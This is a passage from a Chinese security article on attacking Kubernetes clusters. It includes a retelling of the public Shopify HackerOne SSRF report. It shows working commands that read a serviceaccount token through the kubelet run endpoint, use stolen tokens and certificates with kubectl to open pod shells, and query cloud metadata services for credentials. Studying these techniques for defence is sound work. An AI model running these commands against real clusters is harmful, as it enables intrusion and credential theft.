lrwxrwxrwx1 root root 16 Nov 9 16:27 namespace -> ..data/namespace
lrwxrwxrwx1 root root 12 Nov 9 16:27 token -> ..data/token
查看token:
curl -k -XPOST "https://k8-node:10250/run/kube-system/kube-dns-5b1234c4d5-4321/dnsmasq" -d "cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token"
结果如下:
eyJhbGciOiJSUzI1NiI---SNIP---
在安装好 kubectl 后,利用获取的证书 ca.crt
和 token
,对kubernetes API server进行访问
kubectl --server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- get pods --all-namespaces
根据返回的pods信息,指定pod获取执行shell的权限
kubectl exec -it metrics-server-v0.2.1-7f8ee58c8f-ab13f --namespace=kube-system--server=https://1.2.3.4 --certificate-authority=ca.crt --token=eyJhbGciOiJSUzI1NiI---SNIP--- /bin/sh
GKE 和 AWS 之类的云平台会在本地提供元数据服务供开发者获得自己私有仓库的认证信息,如在 GKE 的机器上执行
curl http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token
国外hackerone漏洞赏金平台公开了一份关于Shopify的漏洞报告,通过利用Shopify Exchange的屏幕截图功能中的服务器端请求伪造错误,获取对集群中任意容器的root访问权限。
漏洞利用的关键过程如下:
访问Google Cloud Metadata
<script>
http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json
</script>
https://exchange.shopify.com/create-a-listing
并安装Exchange应用程序由于元数据隐藏未启动,造成 kube-env
属性可以被调用。返回了Kubelet的证书及密钥,调用kubectl可以实现对pod的查询
$ kubectl --client-certificate client.crt --client-key client.pem --certificate-authority ca.crt --server https://██████ get pods --all-namespaces
NAMESPACE NAME READY STATUS RESTARTS AGE
██████████ ████████ 1/1
但是无法对指定pod进行操作,获取返回的shell。通过kubectl 对指定pod执行describe 和get secret找到token所在位置。使用token及证书实现对指定pod的命令执行
$ kubectl --certificate-authority ca.crt --server https://████ --token "█████.██████.███" exec -it w█████████ -- /bin/bash
Defaulting container name to web.
Use 'kubectl describe pod/w█████████' to see all of the containers in this pod.
███████:/# id
uid=0(root) gid=0(root) groups=0(root)
█████:/# ls
app boot dev exec key lib64 mnt proc run srv start tmp var
bin build etc home lib media opt root sbin ssl sysusr
███████:/# exit
详细利用过程可参考报告 https://hackerone.com/reports/341876
在DevOps、微服务等云原生应用的开发过程中,kubernetes技术提供了极大的便利,经过近几年的发展,显示了强大的优势。近年来,由于容器以及容器应用环境引发的安全风险与安全事件不断的被曝出,集群组件、容器镜像、暴露的API、容器的隔离等问题成为了容器使用时需要着重考虑的问题。
作者:斗象能力中心 TCC – Halo
2continuing
2023/01/25 23:381certitude
2022/09/02 20:41potato
2021/06/08 14:55大师傅
2021/01/23 14:38qwer
2019/03/06 11:49oo
2019/03/06 11:47匿名
2019/03/06 11:04匿名
2019/03/06 10:19tewq
2019/03/06 10:17whoami
2019/02/28 22:07